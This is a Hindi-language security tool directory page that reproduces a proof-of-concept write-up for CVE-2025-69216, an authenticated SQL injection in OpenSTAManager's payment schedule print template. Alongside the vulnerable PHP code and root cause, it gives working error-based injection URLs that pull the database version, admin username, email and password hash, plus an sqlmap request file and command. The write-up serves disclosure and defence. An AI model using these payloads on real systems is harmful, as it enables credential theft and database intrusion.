Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-69216 — CVE-2025-69216 के लिए प्रूफ-ऑफ-कॉन्सेप्ट रिपॉजिटरी, जो OpenSTAManager के Scadenzario प्रिंट टेम्पलेट में एक प्रमाणित SQL इंजेक्शन है, जो एरर-आधारित और ब्लाइंड SQLi के माध्यम से एडमिन क्रेडेंशियल्स और डेटाबेस सामग्री के निष्कर्षण को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/lukasz-rybak/cve-2025-69216
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHublukasz-rybak/cve-2025-69216

CVE-2025-69216

CVE-2025-69216 के लिए प्रूफ-ऑफ-कॉन्सेप्ट रिपॉजिटरी, जो OpenSTAManager के Scadenzario प्रिंट टेम्पलेट में एक प्रमाणित SQL इंजेक्शन है, जो एरर-आधारित और ब्लाइंड SQLi के माध्यम से एडमिन क्रेडेंशियल्स और डेटाबेस सामग्री के निष्कर्षण को सक्षम बनाता है।

रिपॉजिटरी देखें
35 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-69216: OpenSTAManager में Scadenzario प्रिंट टेम्पलेट में SQL इंजेक्शन

अवलोकन

फ़ील्डविवरण
CVE आईडीCVE-2025-69216
गंभीरताउच्च
परामर्शपरामर्श देखें
खोजकर्ताLukasz Rybak

प्रभावित उत्पाद

  • devcode-it/openstamanager (संस्करण: <= 2.9.8)

CWE वर्गीकरण

  • CWE-89: SQL कमांड में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन ('SQL इंजेक्शन')

विवरण

सारांश

OpenSTAManager के Scadenzario (भुगतान अनुसूची) प्रिंट टेम्पलेट में एक प्रमाणित SQL इंजेक्शन भेद्यता किसी भी प्रमाणित उपयोगकर्ता को डेटाबेस से संवेदनशील डेटा निकालने की अनुमति देती है, जिसमें एडमिन क्रेडेंशियल, ग्राहक जानकारी और वित्तीय रिकॉर्ड शामिल हैं। यह भेद्यता त्रुटि-आधारित SQL इंजेक्शन तकनीकों के माध्यम से पूर्ण डेटाबेस पढ़ने की पहुँच सक्षम बनाती है।

विवरण

यह भेद्यता templates/scadenzario/init.php में पंक्ति 46 पर मौजूद है, जहाँ id_anagrafica पैरामीटर को उचित सैनिटाइज़ेशन के बिना सीधे SQL क्वेरी में जोड़ दिया जाता है:

संवेदनशील कोड:

root@kitploit:~
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

get() फ़ंक्शन बिना सत्यापन के GET/POST पैरामीटर से उपयोगकर्ता इनपुट प्राप्त करता है। एप्लिकेशन के prepare() सैनिटाइज़ेशन फ़ंक्शन का उपयोग करने के बजाय पैरामीटर मान को स्ट्रिंग संयोजन का उपयोग करके सीधे SQL क्वेरी स्ट्रिंग में एम्बेड किया जाता है, जिससे SQL इंजेक्शन हमले संभव होते हैं।

मूल कारण:

  • इनपुट सैनिटाइज़ेशन के लिए prepare() फ़ंक्शन का उपयोग न करना
  • SQL क्वेरी निर्माण में सीधा स्ट्रिंग संयोजन
  • कोई इनपुट सत्यापन या प्रकार जाँच नहीं

प्रभावित एंडपॉइंट:

root@kitploit:~
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

प्रभावित फ़ाइलें:

  • templates/scadenzario/init.php (पंक्ति 46) - प्राथमिक भेद्यता
  • templates/scadenzario/init.php (पंक्तियाँ 34, 40) - दिनांक पैरामीटर के साथ समान पैटर्न
  • pdfgen.php - टेम्पलेट रेंडरिंग के लिए प्रवेश बिंदु

PoC (प्रूफ ऑफ कॉन्सेप्ट)

पूर्वापेक्षाएँ

  • मान्य प्रमाणित सत्र (कोई भी उपयोगकर्ता भूमिका)

शोषण के चरण

1. भेद्यता की पुष्टि करें - बेसिक सिंटैक्स त्रुटि परीक्षण:

root@kitploit:~
 http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

एप्लिकेशन प्रतिक्रिया में SQL सिंटैक्स त्रुटि प्रदर्शित होती है

छवि

2. डेटाबेस संस्करण निकालें - त्रुटि-आधारित SQLi:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

परिणाम: ~8.3.0~ (MySQL संस्करण)

छवि

3. डेटाबेस का नाम निकालें:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

परिणाम: ~openstamanager~

छवि

4. एडमिन उपयोगकर्ता नाम निकालें:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

परिणाम: ~admin~ छवि


5. एडमिन ईमेल निकालें:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

परिणाम: एडमिन का ईमेल पता

छवि

6. पासवर्ड हैश निकालें (आंशिक - XPATH 31-वर्ण सीमा):

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

परिणाम: bcrypt पासवर्ड हैश

छवि

7. SQLMap के साथ स्वचालित शोषण:

अनुरोध फ़ाइल sqli_osm.req बनाएँ:

root@kitploit:~
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0

SQLMap चलाएँ:

root@kitploit:~
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

SQLMap द्वारा पुष्टि किए गए इंजेक्शन प्रकार:

  • ✅ बूलियन-आधारित ब्लाइंड SQL इंजेक्शन
  • ✅ त्रुटि-आधारित SQL इंजेक्शन (MySQL >= 5.6 GTID_SUBSET)
  • ✅ समय-आधारित ब्लाइंड SQL इंजेक्शन (SLEEP)
छवि

प्रभाव

कौन प्रभावित है:

  • ✅ सभी प्रमाणित उपयोगकर्ता - मान्य क्रेडेंशियल वाला कोई भी उपयोगकर्ता इस भेद्यता का शोषण कर सकता है
  • ✅ निम्न-विशेषाधिकार वाले उपयोगकर्ता - न्यूनतम अनुमतियों वाले उपयोगकर्ता भी एडमिन-स्तर के डेटा तक पहुँच सकते हैं
  • ✅ सभी OpenSTAManager इंस्टॉलेशन - भेद्यता नवीनतम master ब्रांच में मौजूद है

श्रेय

Łukasz Rybak द्वारा रिपोर्ट किया गया

संदर्भ

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69216
  • https://github.com/advisories/GHSA-q6g3-fv43-m2w6

अस्वीकरण

यह CVE समन्वित भेद्यता प्रकटीकरण प्रथाओं का पालन करते हुए जिम्मेदारीपूर्वक प्रकट किया गया था। यहाँ प्रदान की गई जानकारी केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है।

टूल डाउनलोड करें